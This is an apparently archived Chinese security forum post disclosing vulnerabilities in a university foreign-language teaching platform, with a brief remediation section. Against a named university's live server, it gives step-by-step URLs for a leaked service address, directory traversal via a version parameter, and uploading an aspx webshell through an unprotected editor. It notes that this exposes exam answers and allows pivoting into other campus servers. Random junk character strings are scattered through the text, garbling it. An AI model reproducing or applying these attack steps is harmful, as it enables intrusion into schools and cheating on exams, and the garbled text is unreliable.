找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2161|回复: 0
打印 上一主题 下一主题

新理念外语网络教学平台文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:10:29 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中4 G1 g+ D! L* j( r. _7 b& P
1 i8 m: N3 A+ U; o" N
详细说明:2 Z( g9 X0 b$ L1 P5 ?! w% F3 W

/ ^5 c5 c& x, A3 L, ?以南开大学的为例:
- ?+ w! J' Z6 y; ~8 ?http://222.30.60.3/NPELS0 e! i3 Z) V% P  a0 s/ U8 z' [
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址2 k1 F- r7 c+ k( n
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
! q% E% j. b9 F8 `  p<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
1 l# X  ^& s0 C4 w% D) T. s</setting>; O8 E$ \8 h1 y$ O$ c% n; R2 b
及版本号
# R2 g. Z; Y0 d9 N2 q7 r3 T: m) f& @<add key="TVersion" value="1, 0, 0, 2187">
# ^3 q$ g  o  o0 Z  t  s</add>; {5 C0 {$ X# j  |! s! d; G
直接访问
, X' |& c5 K4 I$ t- Whttp://222.30.60.3/NPELS/CommonService.asmx
& x/ f1 g" [) r) g* K使用GetTestClientFileList操作,直接 HTTP GET 列目录:6 L6 [7 U2 F0 `" h
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187* l3 B( W  G' }, v( A
进一步列目录(返回的网页很大,可以直接 wget 下来)5 U) b% K6 Y! n. \! ]; ?
http://222.30.60.3/NPELS/CommonS ... List?version=../../. m  ~9 W. ~/ V* N$ T
7 {6 a( ]7 X- [' {$ W4 `/ E! L) |% w: e
发现" _1 @5 N* R3 @9 M1 j* n0 t
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
. x0 m: W" ], u) d可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
; {6 _) N& i4 a上传后继续列目录找到木马地址直接访问即可2 l0 \; W5 h( \) F6 F" O: d
" [+ t" k5 D9 Z/ C: x8 ~! L: D1 D
OOXX: w3 {; l6 r! S  C. O
( v+ o7 E( v" t, a) v! C& H
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法0 X7 c2 |' P9 s% k& R* R
漏洞证明:, A4 Q) X7 z  Q0 ~

4 V: P$ g5 z- \- r+ _0 M3 Z+ u6 k/ M列目录:
1 |, I$ |. [" Hhttp://222.30.60.3/NPELS/CommonS ... List?version=../../9 u3 ?7 O, s. \. F7 Q2 I# g
文件上传:" b, `2 a) E) |
http://222.30.60.3/npelsv/editor/editor.htm
1 b/ t0 Y# l" P1 L# u) d # q! t3 Z, ?8 W$ A$ E/ S
上传木马:
/ U0 o" o% Y6 v4 whttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
- u$ S5 L+ W: H& {; c7 S0 ?4 [) O 3 ]! C, h0 A$ P; T
修复方案:* A/ }! A( W9 u- y
好像考试系统必须使用 CommonService.asmx
/ M; a# u( x# p. U最好配置文件加密或者用别的方式不让它泄露出来
6 x  B0 ?& ^9 P. S, y7 l6 a' L1 n并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样​
5 N3 ^8 z2 Y) O3 m& p
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表